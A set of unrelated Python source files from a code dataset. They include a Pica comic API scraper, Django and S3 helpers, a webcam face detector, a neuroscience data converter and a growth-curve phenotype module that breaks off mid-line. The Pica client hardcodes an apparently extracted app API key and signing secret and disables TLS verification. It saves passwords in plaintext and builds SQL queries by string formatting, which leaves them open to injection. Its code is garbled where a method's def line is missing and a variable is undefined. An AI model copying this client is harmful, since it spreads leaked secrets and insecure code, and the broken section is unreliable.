+{"seq_id":"114881697","text":"# -*- coding: utf-8 -*-\nimport re\nimport os\n\nimport hmac\nimport time\nimport json\nimport uuid\nimport threading\nimport zipfile\nimport urllib3\nimport sqlite3\nimport logging\nimport hashlib\nimport platform\nimport requests\nfrom urllib import parse\nlogging.basicConfig(filename='pica.log',\n level=logging.INFO,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(message)s',\n datefmt='%m-%d %H:%M:%S',\n filemode=\"w\")\nurllib3.disable_warnings()\nglobal_url = \"https://picaapi.picacomic.com/\"\napi_key = \"C69BAF41DA5ABD1FFEDC6D2FEA56B\"\nsecret_key = \"~n}$S9$lGts=U)8zfL/R.PM9;4[3|@/CEsl~Kk!7?BYZ:BAa5zkkRBL7r|1/*Cr\"\nuuid_s = str(uuid.uuid4()).replace(\"-\", \"\")\nheader = {\n \"api-key\": \"C69BAF41DA5ABD1FFEDC6D2FEA56B\",\n \"accept\": \"application/vnd.picacomic.com.v1+json\",\n \"app-channel\": \"2\",\n \"time\": 0,\n \"nonce\": \"\",\n \"signature\": \"encrypt\",\n \"app-version\": \"2.1.0.4\",\n \"app-uuid\": \"418e56fb-60fb-352b-8fca-c6e8f0737ce6\",\n \"app-platform\": \"android\",\n \"app-build-version\": \"39\",\n \"Content-Type\": \"application/json; charset=UTF-8\",\n \"User-Agent\": \"okhttp/3.8.1\",\n}\nproxies = None\n\n\nclass Pica:\n\n def __init__(self, account, password):\n self.path = \"D:/pic/\" if platform.system() == 'Windows' else \"/mnt/usb/\"\n self.account = account\n self.password = password\n self.header = header.copy()\n self.uuid_s = str(uuid.uuid4()).replace(\"-\", \"\")\n self.header[\"nonce\"] = self.uuid_s\n self.db = sqlite3.connect(\"data.db\")\n self.communicate_db(\"create table account (email text PRIMARY KEY NOT NULL, password text, key text);\")\n self.communicate_db(\"create table crew (id text PRIMARY KEY NOT NULL,name text,data text);\")\n self.check()\n\n def communicate_db(self, sql):\n cur = self.db.cursor()\n try:\n __res = cur.execute(sql).fetchall()\n logging.info(str(__res))\n self.db.commit()\n return __res\n except sqlite3.OperationalError:\n return []\n\n def check(self):\n token = self.communicate_db(\"select key from account where email='{}';\".format(self.account))\n if len(token) == 0:\n token = self.login()\n self.communicate_db(\"insert into account (email, password, key)\" +\n \"values ('{0}', '{1}', '{2}');\".format(self.account, self.password, token))\n return\n token = token[0][0]\n self.header[\"authorization\"] = token\n __res = self.get(global_url + \"users/profile\")\n try:\n __res = __res.json()\n except json.JSONDecodeError:\n logging.error(__res.text)\n raise # re-raise the original error; JSONDecodeError cannot be constructed without arguments\n if __res[\"code\"] != 200:\n token = self.login()\n self.communicate_db(\"update account set key='{0}' where email='{1}';\".format(token, self.account))\n
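\n # Usage sketch for this client (placeholder credentials, for illustration\n # only): on the first run check() signs in and caches the token in data.db;\n # later runs reuse it until the profile probe stops returning code 200.\n # client = Pica('user@example.com', 'password123')\n # print(client.categories().text)\n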
self.header[\"signature\"] = self.encrypt(url, ts, \"POST\", self.uuid_s)\n return requests.post(url=url, data=data, headers=self.header, verify=False, proxies=proxies)\n\n def get(self, url):\n ts = str(int(time.time()))\n self.header[\"time\"] = ts\n self.header[\"signature\"] = self.encrypt(url, ts, \"GET\", self.uuid_s)\n header_tmp = self.header.copy()\n header_tmp.pop(\"Content-Type\")\n # print(url)\n # print(self.header)\n while True:\n try:\n return requests.get(url=url, headers=header_tmp, verify=False, proxies=proxies)\n except:\n time.sleep(10)\n\n @staticmethod\n def encrypt(url, ts, method, uuid_ss):\n \"\"\"\n\n :param url: 完整链接:https://picaapi.picacomic.com/auth/sign-in\n :param ts: 要和head里面的time一致, int(time.time())\n :param method: http请求方式: \"GET\" or \"POST\"\n :param uuid_ss: str, len(uuid)==32\n :return: header[\"signature\"]\n \"\"\"\n raw = url.replace(\"https://picaapi.picacomic.com/\", \"\") + str(ts) + uuid_ss + method + api_key\n raw = raw.lower()\n hc = hmac.new(secret_key.encode(), digestmod=hashlib.sha256)\n hc.update(raw.encode())\n return hc.hexdigest()\n\n def login(self):\n api = \"auth/sign-in\"\n url = global_url + api\n send = {\"email\": self.account, \"password\": self.password}\n __a = self.post(url=url, data=json.dumps(send)).text\n logging.info(__a)\n self.header[\"authorization\"] = json.loads(__a)[\"data\"][\"token\"]\n return self.header[\"authorization\"]\n\n def categories(self):\n api = \"categories\"\n url = global_url + api\n return self.get(url)\n\n def block(self, __page, __word):\n \"\"\"\n bl:妹妹系,性轉換,\n \"\"\"\n api = \"comics?page={0}&c={1}&s=ua\".format(__page, parse.quote(__word))\n url = global_url + api\n return self.get(url)\n\n def searchs(self, __page, __word):\n url = global_url + \"comics/search?page={0}&q={1}\".format(__page, parse.quote(__word))\n return self.get(url)\n\n def tags(self, __page, __word):\n url = global_url + \"comics?page={}&t={}\".format(__page, parse.quote(__word)) \n return self.get(url)\n\n def comics(self, __id, __name):\n print(__name, time.ctime())\n api = global_url + \"comics/{0}/eps?\".format(__id) + \"page={0}\"\n url = api.format(1)\n _return = []\n __pages = self.get(url).json()[\"data\"][\"eps\"][\"pages\"]\n for _ in range(1, 2): # __pages + 1\n url = api.format(_)\n __res = self.get(url).json()[\"data\"][\"eps\"][\"docs\"]\n for __ in __res:\n _name = re.sub(\"[|:/*\\\\s!?]*\", \"\", __name + __[\"title\"])\n print(_name)\n _return.append({\"name\": _name, \"fid\": __id, \"order\": __[\"order\"], \"id\": __[\"_id\"]})\n return _return\n\n def comic(self, __order, __id, _name):\n api = global_url + 'comics/{0}/order/{1}/pages'.format(__id, __order) + '?page={0}'\n url = api.format(1)\n _return = []\n __pages = self.get(url).json()[\"data\"][\"pages\"][\"pages\"]\n try:\n os.makedirs(\"D:/pic/{}\".format(_name))\n except FileExistsError:\n pass\n for _ in range(1, __pages + 1): # __pages + 1\n url = api.format(_)\n __res = self.get(url).json()[\"data\"][\"pages\"][\"docs\"]\n for __ in __res:\n _tmp = __[\"media\"]\n file_name = \"D:/pic/{}/{}\".format(_name, _tmp[\"originalName\"])\n if os.path.exists(file_name) and os.path.getsize(file_name) != 0:\n continue\n with open(file_name, \"wb\") as out:\n _pic = self.get_picture(\"https://storage1.picacomic.com/static/\" + _tmp[\"path\"])\n out.write(_pic)\n print(_name, time.ctime(), \"done\")\n return _name, time.ctime(), \"done\"\n\n\n def get_picture(self, url):\n while True:\n try:\n __a = self.get(url)\n if __a.status_code != 200:\n continue\n 
break\n except requests.exceptions.ConnectionError:\n logging.error(\"get picture failed: \" + url)\n time.sleep(8)\n return __a.content\n\n def search(self, __word):\n api = global_url + \"comics/search?page={0}\" + \"&q={0}\".format(parse.quote(__word))\n url = api.format(1)\n __pages = self.get(url).json()[\"data\"][\"comics\"][\"pages\"]\n _return = []\n for _ in range(1, 3): # __pages + 1\n url = api.format(_)\n __res = self.get(url).json()[\"data\"][\"comics\"][\"docs\"]\n for __ in __res:\n if __[\"likesCount\"] < 200:\n continue\n if __[\"pagesCount\"] / __[\"epsCount\"] > 60 or __[\"epsCount\"] > 10:\n continue\n _return.append({\"name\": __[\"title\"], \"id\": __[\"_id\"]})\n return _return\n\n","sub_path":"pica/pic2.py","file_name":"pic2.py","file_ext":"py","file_size_in_byte":8144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"334266666","text":"from setuptools import setup, find_packages\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, \"README.md\"), mode=\"r\", encoding=\"utf-8\") as f:\n long_description = f.read()\n\nextras_require = {\n 'dev': ([\n 'pytest',\n 'pytest-django',\n 'jsonschema',\n 'flake8',\n 'autopep8'\n ])\n}\n\nsetup(\n name=\"supertokens_jwt_ref\",\n version=\"2.0.0\",\n author=\"Bhumil Sarvaiya, Rishabh Poddar\",\n license=\"MIT\",\n author_email=\"sarvaiyabhumil@gmail.com, rishabh@supertokens.io\",\n description=\"SuperTokens session management solution\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/supertokens/supertokens-django-ref-jwt\",\n packages=find_packages(exclude=[\"contrib\", \"docs\", \"tests*\", \"licenses\", \"requirements\"]),\n classifiers=[\n \"Framework :: Django :: 2.2\",\n \"Framework :: Django\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n \"Intended Audience :: Developers\",\n \"Topic :: Internet :: WWW/HTTP :: Session\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n keywords=\"\",\n install_requires=[\n \"django\",\n \"djangorestframework\",\n \"pycryptodome\",\n ],\n python_requires='>=3.7',\n extras_require=extras_require\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"424024200","text":"#!/usr/bin/env python3\n\ndef dehtmlize_line(line):\n state=True\n out_line=\"\"\n for char in line:\n if char=='<':\n state=False\n elif char=='>':\n if state:\n out_line+=char\n state=True\n else:\n if state:\n out_line+=char\n return out_line\n\ndef main(filename):\n for line in open(filename):\n print(dehtmlize_line(line).strip())\n\nif __name__==\"__main__\":\n from sys import argv\n main(argv[-1])\n","sub_path":"Code Snippets/de_htmlizer.py","file_name":"de_htmlizer.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"111237709","text":"N_TESTS = 10\nMAX_A = 10 ** 9\n\nimport os\nimport random\n\nrandom.seed(0)\n\nscript_path = os.path.realpath(__file__)\ndir_path = os.path.dirname(script_path)\ntest_dir = os.path.join(dir_path, 'tests')\n\nif not os.path.exists(test_dir):\n os.mkdir(test_dir)\n\ncurr_test = 1\ndef print_test(a, b):\n global curr_test\n\n assert(curr_test <= 
N_TESTS)\n assert(-MAX_A <= a <= MAX_A)\n assert(-MAX_A <= b <= MAX_A)\n\n print('printing test %d' % curr_test)\n fname = os.path.join(test_dir, '%03d' % curr_test)\n with open(fname, 'w') as f:\n f.write('%d %d\\n' % (a, b))\n\n curr_test += 1\n\n# sample tests\nprint_test(2, 2)\nprint_test(1, 4)\n\nwhile curr_test <= N_TESTS:\n a = random.randint(-MAX_A, MAX_A)\n b = random.randint(-MAX_A, MAX_A)\n print_test(a, b)\n","sub_path":"problems/practice-sum/testgen.py","file_name":"testgen.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"113750939","text":"#!/usr/bin/python\n\nimport pygame\n\nfrom . import (\n dice,\n )\n\n\nclass Bullet(pygame.sprite.Sprite):\n # Subclass must provide self.damage_roll = (qty, sides)\n\n def __init__(self, velocity, coord):\n super().__init__()\n self.damage = dice.roll(*self.damage_roll)\n self.velocity = velocity\n self.image = pygame.Surface([5, 5])\n self.image.fill((200, 0, 0))\n self.coord = coord\n self.radius = self.rect.width\n\n def update(self, dt):\n \"\"\"Update the Bullet for `dt` milliseconds.\"\"\"\n self.coord.x += self.velocity.xVelocity * (dt / 1000.0)\n self.coord.y += self.velocity.yVelocity * (dt / 1000.0)\n\n @property\n def rect(self):\n r = self.image.get_rect()\n r.x = self.coord.x\n r.y = self.coord.y\n return r\n\n\nclass Stone(Bullet):\n # Damage is 1d3\n # XXX - should wrap this into dice.Roll or DiceSpec\n damage_roll = (1, 3)\n\n\nclass Flint(Bullet):\n damage_roll = (1, 6)\n\n\nclass Dart(Bullet):\n damage_roll = (2, 3)\n","sub_path":"yendor/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
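# The `dice` module imported by bullet.py above is not part of this excerpt.
# A minimal sketch of the interface it appears to expose, inferred from the
# damage_roll tuples (an assumption, not the module's actual source):
import random

def roll(qty, sides):
    # sum `qty` independent rolls of a `sides`-sided die
    return sum(random.randint(1, sides) for _ in range(qty))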
+{"seq_id":"139613682","text":"\"\"\"\nlogging service module\n\"\"\"\nfrom os import environ\nfrom os.path import join, dirname\nfrom datetime import datetime\nimport boto3\n\n__author__ = 'Mechanical Rock'\n__version__ = '0.0.1'\n\n\nclass LoggingService(object):\n \"\"\"\n Logging service for instance reaper actions\n\n :type region: string\n :param region: the aws region\n \"\"\"\n BUCKET_NAME = 'instance-reaper-{}-logging'.format(environ.get('TEAM_NAME'))\n\n def __init__(self, region):\n s3_endpoint = \"http://localhost:4572\" if self.is_local() else None\n self.s3_resource = boto3.resource('s3', endpoint_url=s3_endpoint)\n self.log_key = 'instance-reaper-{}.log'.format(region)\n self.log_file = self.get_local_log_name(self.log_key)\n self.region = region\n\n # ensure log file exists\n bucket = self.s3_resource.Bucket(self.BUCKET_NAME)\n log_exists = False\n for bucket_object in bucket.objects.all():\n if self.log_key == bucket_object.key:\n log_exists = True\n\n if not log_exists:\n self.s3_resource.Object(self.BUCKET_NAME, self.log_key).put()\n\n @staticmethod\n def is_local():\n \"\"\"\n checks if we are in a local environment\n\n :rtype: boolean\n :return: whether the ENV environment variable is set to local\n \"\"\"\n return environ.get(\"ENV\") == \"local\"\n\n def get_log(self):\n \"\"\"\n downloads the log file\n \"\"\"\n self.s3_resource.Bucket(self.BUCKET_NAME).download_file(\n self.log_key, self.log_file)\n\n def write_log(self, message):\n \"\"\"\n appends a log message to the local copy of the log file;\n save_log uploads it back to the s3 bucket\n \"\"\"\n with open(self.log_file, \"a\") as reaper_log:\n reaper_log.write(\"{}: {}\\n\".format(datetime.utcnow(), message))\n\n def save_log(self):\n \"\"\"\n saves the newly adapted log file\n \"\"\"\n self.s3_resource.Bucket(self.BUCKET_NAME).upload_file(\n self.log_file, self.log_key)\n\n def log_instance_details(self, instance, cpu_util, net_out, tags):\n \"\"\"\n log the instance details\n\n :type instance: dict\n :param instance: the instance details to be logged\n\n :type cpu_util: int\n :param cpu_util: average cpu utilisation over 3 hours\n\n :type net_out: int\n :param net_out: average network out in kb over 3 hours\n\n :type tags: list\n :param tags: the instance tags\n \"\"\"\n self.write_log(\"*************************************************\")\n self.write_log(\"Evaluating instance with id: {}\".format(\n instance['InstanceId']))\n self.write_log(\"Instance launched at: {}\".format(\n instance['LaunchTime']))\n self.write_log(\"Instance has tags: {}\".format(tags))\n self.write_log(\"CPU utilisation is {}%\".format(cpu_util))\n self.write_log(\"Network out is {}kb\".format(net_out))\n\n def get_local_log_name(self, log_key):\n \"\"\"\n get a file name for log file that can be stored locally or\n on a lambda container.\n\n :type log_key: string\n :param log_key: the file name to be used\n\n :rtype: string\n :return: the relevant file name for the environment\n \"\"\"\n dev_log = join(dirname(dirname(__file__)), 'tmp', log_key)\n lambda_log = '/tmp/{}'.format(log_key)\n\n return dev_log if self.is_local() else lambda_log\n","sub_path":"src/utils/logging_service.py","file_name":"logging_service.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"437485518","text":"import cv2\r\n\r\n# Enable camera\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3, 640)\r\ncap.set(4, 420)\r\n\r\n# import cascade file for facial recognition\r\nfaceCascade = cv2.CascadeClassifier(cv2.data.haarcascades + \"haarcascade_frontalface_default.xml\")\r\neyeCascade = cv2.CascadeClassifier(cv2.data.haarcascades + \"haarcascade_eye_tree_eyeglasses.xml\")\r\n\r\n'''\r\n # if you want to detect any object for example eyes, use one more layer of classifier as below:\r\n eyeCascade = cv2.CascadeClassifier(cv2.data.haarcascades + \"haarcascade_eye_tree_eyeglasses.xml\")\r\n'''\r\n\r\nwhile True:\r\n success, img = cap.read()\r\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n # Getting corners around the face\r\n faces = faceCascade.detectMultiScale(imgGray, 1.3, 1) # 1.3 = scale factor, 1 = minimum neighbors\r\n # drawing bounding box around face\r\n for (x, y, w, h) in faces:\r\n img = cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 3)\r\n\r\n \r\n \r\n eyes = eyeCascade.detectMultiScale(imgGray)\r\n \r\n for (ex, ey, ew, eh) in eyes:\r\n img = cv2.rectangle(img, (ex, ey), (ex+ew, ey+eh), (255, 0, 0), 3)\r\n # draw text on the image\r\n output = img.copy()\r\n cv2.putText(output, \"vineeshathoutam\", (75, 75), \r\n\t cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\r\n cv2.imshow(\"Text\", output)\r\n\r\n \r\n \r\n if cv2.waitKey(10) & 0xFF == ord('q'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","sub_path":"webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"487441065","text":"\n\nfrom xai.brain.wordbase.nouns._sergeant import _SERGEANT\n\n#class header\nclass _SERGEANTS(_SERGEANT, ):\n\tdef __init__(self,): \n\t\t_SERGEANT.__init__(self)\n\t\tself.name = \"SERGEANTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"sergeant\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_sergeants.py","file_name":"_sergeants.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"16081556","text":"# STEP 2:\n# Let's add the comment form to our post view. If we create it\n# in the view, we can add it to that view's context dictionary,\n# which will allow us to pass it along to the template to be\n# rendered. \n\n# Remember to import the `redirect` shortcut on the line below, along with `render`\nfrom django.shortcuts import render, redirect\nfrom post.models import Post\n# Import the new form here:\nfrom post.forms import CommentForm\n\n\ndef index(request):\n # let's show all the posts, with newest first\n posts = Post.objects.all().order_by('-published')\n context = {'posts': posts}\n return render(request, 'index.html', context)\n\n\ndef post(request, post_id):\n post = Post.objects.get(id=post_id)\n\n # Instantiate the CommentForm class here. At this\n # point in our workflow, the user has already made\n # a request to view, so we know what the post_id\n # is that they are viewing. Since our Comment Model\n # (and likewise, the Comment ModelForm) are tied to \n # a specific Post pk, we can just pass in that pk\n # to our form (this means the user won't have to\n # select the post they want to comment on from\n # a dropdown.)\n form = CommentForm(initial={'post': post.pk})\n \n # Remember how I said we have access to everything\n # about the request in the view? Well this comes in\n # handy when dealing with forms! When you make a GET\n # request to a post URL, we load the form. If you submit\n # the form via a POST, we can use this if condition to\n # reinitialize our CommentForm with the data from the POST\n # (IE, the comment text).\n if request.method == \"POST\":\n # At this point in the workflow,\n # we are dealing with a bound form. A bound form has\n # data associated with it. \n form = CommentForm(request.POST)\n # Next, Django makes it REALLY easy to check if our form is\n # valid. By calling form.is_valid(), we know if the form was\n # submitted correctly, or if it should be rerendered with\n # the appropriate errors (for example, if you didn't\n # submit the form with all of the required fields filled in) \n if form.is_valid():\n # remember, a bound, valid ModelForm is just a model instance\n # ready to be saved to the database! Remember when we called\n # post.save() in the shell and the post was committed to the\n # database? That's exactly what we're doing here.\n form.save()\n # Finally, let's redirect the user back to the post they were just on.\n return redirect('/post/{}/'.format(post_id))\n\n # Whoa, what's this \"comment_set\" nonsense? It's a helper method Django gives\n # us that allows us to grab the _set_ of _comments_ associated to a post!\n # It's the same as using \"Comment.objects.filter(post=post)\"\n # \n # https://docs.djangoproject.com/en/dev/topics/db/queries/#following-relationships-backward\n comments = post.comment_set.all() \n\n # Finally, here is our updated context! 
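 # Note: CommentForm lives in post/forms.py, which is not shown here. A\n # minimal definition consistent with how this view uses it would be a\n # ModelForm over the Comment model (the field names are assumptions):\n #\n # from django import forms\n # from post.models import Comment\n #\n # class CommentForm(forms.ModelForm):\n # class Meta:\n # model = Comment\n # fields = ['post', 'text']\n # widgets = {'post': forms.HiddenInput()}\n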
\n # Along with post, we're passing in `form` and `comments`\n context = {'post': post, 'form': form, 'comments': comments}\n return render(request, 'post.html', context)\n\n","sub_path":"post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"49483251","text":"from csv import reader, writer\nfrom pathlib import Path\n\nimport pandas as pd\nfrom joblib import Parallel, delayed\nfrom oneibl.one import ONE\nfrom pynwb import NWBHDF5IO\nfrom tqdm import tqdm\n\nfrom ibl_to_nwb.AlyxToNWB.alyx_to_nwb_converter import Alyx2NWBConverter\nfrom ibl_to_nwb.AlyxToNWB.alyx_to_nwb_metadata import Alyx2NWBMetadata\n\nwith open(r\"path-to-csv.csv\", \"r\") as io:\n eid_list = [row[0] for row in reader(io)]\none = ONE()\ndir = Path.cwd()\nmetadata_errors = dir / f\"metadata_errors.csv\"\nconverter_errors = dir / f\"converter_errors.csv\"\n\n\ndef converter(eid, no):\n fileloc = dir / f\"beh_eid_{eid}.json\"\n nwb_saveloc = dir / f\"beh_eid_{eid}.nwb\"\n print(no)\n if not Path(fileloc).is_file():\n try:\n converter_metadata = Alyx2NWBMetadata(eid=eid, one_obj=one)\n converter_metadata.write_metadata(fileloc)\n except Exception as e:\n print(f\"could not convert metadata for {eid}\\n {str(e)}\")\n with open(metadata_errors, \"a+\", newline=\"\") as write_obj:\n # Create a writer object from csv module\n csv_writer = writer(write_obj)\n csv_writer.writerow([eid, str(e)])\n return\n\n if not Path(nwb_saveloc).is_file():\n try:\n converter_nwb = Alyx2NWBConverter(\n one_object=one, nwb_metadata_file=fileloc, saveloc=nwb_saveloc, save_raw=False\n )\n\n execute_list = [\n converter_nwb.create_stimulus,\n converter_nwb.create_trials,\n converter_nwb.create_behavior,\n converter_nwb.create_probes,\n converter_nwb.create_iblsubject,\n converter_nwb.create_lab_meta_data,\n converter_nwb.create_acquisition,\n ]\n t = tqdm(execute_list)\n for i in t:\n t.set_postfix(current=f\"creating nwb \" + i.__name__.split(\"_\")[-1])\n i()\n print(\"done converting\")\n\n converter_nwb.write_nwb()\n except Exception as e:\n print(f\"could not convert for {eid}, {e}\")\n with open(converter_errors, \"a+\", newline=\"\") as write_obj:\n # Create a writer object from csv module\n csv_writer = writer(write_obj)\n csv_writer.writerow([eid, str(e)])\n\n\nParallel(n_jobs=20)(delayed(converter)(eid, no) for no, eid in enumerate(eid_list))\n","sub_path":"ibl_to_nwb/old_conversion/conversion_scripts/create_nwb_behavior.py","file_name":"create_nwb_behavior.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"260262812","text":"import numpy as np\nfrom enum import Enum\n\nfrom scanomatic.data_processing import growth_phenotypes\nfrom scanomatic.io.logger import Logger\nfrom scanomatic.data_processing.phases.analysis import CurvePhasePhenotypes\nfrom scanomatic.data_processing.phases.segmentation import CurvePhases, is_detected_non_linear\n\n_l = Logger(\"Curve Phase Meta Phenotyping\")\n\n\nclass CurvePhaseMetaPhenotypes(Enum):\n \"\"\"Phenotypes of an entire growth-curve based on the phase segmentation.\n\n Attributes:\n CurvePhaseMetaPhenotypes.MajorImpulseYieldContribution:\n The fraction of the total yield (in population doublings) that the\n `CurvePhases.Impulse` that contribute most to the total yield is\n responsible for (`CurvePhasePhenotypes.FractionYield`).\n\n 
CurvePhaseMetaPhenotypes.FirstMinorImpulseYieldContribution:\n As with `CurvePhaseMetaPhenotypes.MajorImpulseYieldContribution`\n but for the second most important `CurvePhases.Impulse`\n\n CurvePhaseMetaPhenotypes.MajorImpulseAveragePopulationDoublingTime:\n The `CurvePhases.Impulse` that contribute most to the\n total yield, its average population doubling time\n (`CurvePhasePhenotypes.PopulationDoublingTime`).\n\n CurvePhaseMetaPhenotypes.FirstMinorImpulseAveragePopulationDoublingTime:\n The average population doubling time of\n the second most contributing `CurvePhases.Impulse`\n\n CurvePhaseMetaPhenotypes.MajorImpulseFlankAsymmetry:\n The `CurvePhasePhenotypes.AsymptoteAngle` ratio of the right\n to left flanking non-linear phase.\n\n CurvePhaseMetaPhenotypes.InitialAccelerationAsymptoteAngle:\n The `CurvePhasePhenotypes.AsymptoteAngle` of the first `CurvePhases.Acceleration`\n CurvePhaseMetaPhenotypes.FinalRetardationAsymptoteAngle:\n The `CurvePhasePhenotypes.AsymptoteAngle` of the last `CurvePhases.Retardation`\n CurvePhaseMetaPhenotypes.InitialAccelerationAsymptoteIntersect:\n The `CurvePhasePhenotypes.AsymptoteIntersection` of the first `CurvePhases.Acceleration`\n CurvePhaseMetaPhenotypes.FinalRetardationAsymptoteIntersect:\n The `CurvePhasePhenotypes.AsymptoteIntersection` of the last `CurvePhases.Retardation`\n\n CurvePhaseMetaPhenotypes.InitialLag:\n The intercept time of the linear model of the first `CurvePhases.Flat` and the first\n `CurvePhases.Impulse`. Note that this does not have to be the major impulse in the above\n measurements.\n CurvePhaseMetaPhenotypes.ExperimentDoublings:\n (Not implemented) Total doublings\n CurvePhaseMetaPhenotypes.Modalities:\n The number of `CurvePhases.Impulse`\n CurvePhaseMetaPhenotypes.Collapses:\n The number of `CurvePhases.Collapse`\n\n CurvePhaseMetaPhenotypes.ResidualGrowth:\n (Not implemented) Classifying the growth that happens after the last `CurvePhases.Impulse`.\n\n See Also:\n filter_plate: Get one of these out of a plate of phase segmentation information\n \"\"\"\n MajorImpulseYieldContribution = 0\n FirstMinorImpulseYieldContribution = 1\n MajorImpulseAveragePopulationDoublingTime = 5\n FirstMinorImpulseAveragePopulationDoublingTime = 6\n MajorImpulseFlankAsymmetry = 8\n\n InitialAccelerationAsymptoteAngle = 10\n FinalRetardationAsymptoteAngle = 11\n InitialAccelerationAsymptoteIntersect = 15\n FinalRetardationAsymptoteIntersect = 16\n\n InitialLag = 20\n InitialLagAlternativeModel = 22\n\n ExperimentDoublings = 21\n\n Modalities = 25\n ModalitiesAlternativeModel = 27\n\n Collapses = 26\n\n ResidualGrowth = 30\n\n\nclass VectorPhenotypes(Enum):\n \"\"\"The vector type phenotypes used to store phase segmentation\n\n Attributes:\n VectorPhenotypes.PhasesClassifications:\n 1D vector the same length as growth data with the `CurvePhases` values\n for classification of which phase each population size measurement in the growth data\n is classified as.\n VectorPhenotypes.PhasesPhenotypes:\n 1D vector of `CurvePhasePhenotypes` keyed dicts for each segment in the curve.\n \"\"\"\n PhasesClassifications = 0\n \"\"\":type : VectorPhenotypes\"\"\"\n PhasesPhenotypes = 1\n \"\"\":type : VectorPhenotypes\"\"\"\n\n\ndef filter_plate_custom_filter(\n plate,\n phase=CurvePhases.GrowthAcceleration,\n measure=CurvePhasePhenotypes.AsymptoteIntersection,\n phases_requirement=lambda phases: len(phases) == 1,\n phase_selector=lambda phases: phases[0]):\n\n def f(phenotype_vector):\n phases = tuple(d for t, d in phenotype_vector if t == phase)\n if 
phases_requirement(phases):\n return phase_selector(phases)[measure]\n return np.nan\n\n return np.ma.masked_invalid(np.frompyfunc(f, 1, 1)(plate).astype(np.float))\n\n\ndef filter_plate_on_phase_id(plate, phases_id, measure):\n\n def f(phenotype_vector, phase_id):\n if phase_id < 0:\n return np.nan\n\n try:\n return phenotype_vector[phase_id][1][measure]\n except (KeyError, TypeError):\n return np.nan\n\n return np.ma.masked_invalid(np.frompyfunc(f, 2, 1)(plate, phases_id).astype(np.float))\n\n\ndef _get_phase_id(plate, *phases):\n\n l = len(phases)\n\n def f(v):\n v = zip(*v)[0]\n i = 0\n for id_phase, phase in enumerate(v):\n if i < l:\n if phase is phases[i]:\n i += 1\n if i == l:\n return id_phase\n\n return -1\n\n return np.frompyfunc(f, 1, 1)(plate).astype(np.int)\n\n\ndef _phase_finder(phase_vector, phase):\n\n if phase_vector:\n return tuple(i for i, (p_type, p_data) in enumerate(phase_vector) if p_type == phase)\n return tuple()\n\n# REGION: Phase counters\n\n\ndef _py_impulse_counter(phase_vector):\n if phase_vector:\n return sum(1 for phase in phase_vector if phase[0] == CurvePhases.Impulse)\n return -1\n\n_np_impulse_counter = np.frompyfunc(_py_impulse_counter, 1, 1)\n\n\ndef _np_ma_impulse_counter(phases):\n\n return np.ma.masked_less(_np_impulse_counter(phases), 0)\n\n\ndef _py_inner_impulse_counter(phase_vector):\n\n if phase_vector:\n acc = _phase_finder(phase_vector, CurvePhases.GrowthAcceleration)\n if not acc:\n return -1\n ret = _phase_finder(phase_vector, CurvePhases.GrowthRetardation)\n if not ret:\n return -1\n return _py_impulse_counter(phase_vector[acc[0]: ret[-1]])\n\n return -1\n\n_np_inner_impulse_counter = np.frompyfunc(_py_inner_impulse_counter, 1, 1)\n\n\ndef _np_ma_inner_impulse_counter(phases):\n\n return np.ma.masked_less(_np_inner_impulse_counter(phases), 0)\n\n\ndef _py_collapse_counter(phase_vector):\n if phase_vector:\n return sum(1 for phase in phase_vector if phase[0] == CurvePhases.Collapse)\n return -1\n\n_np_collapse_counter = np.frompyfunc(_py_collapse_counter, 1, 1)\n\n\ndef _np_ma_collapse_counter(phases):\n\n return np.ma.masked_less(_np_collapse_counter(phases), 0)\n\n# END REGION: Phase counters\n\n# REGION: Major pulse index\n\n\ndef _py_get_major_impulse_for_plate(phases):\n \"\"\"Locates major impulses\n\n First the phases sort order based on yield is constructed\n\n The indices and sort order of those that are impulses are\n collected.\n\n Then the original index of the phase with the highest\n sort order is returned.\n\n Args:\n phases: Plate of phase data\n\n Returns: 2D numpy.ma.masked_array with indices of the major\n growth impulses in the vectors.\n \"\"\"\n\n sort_order = np.argsort(tuple(\n p_data[CurvePhasePhenotypes.FractionYield] if\n p_data is not None and p_data[CurvePhasePhenotypes.FractionYield] else -np.inf for p_type, p_data in phases))\n\n impulses = np.array(tuple(\n (i, v) for i, v in enumerate(sort_order) if\n phases[i][VectorPhenotypes.PhasesClassifications.value] == 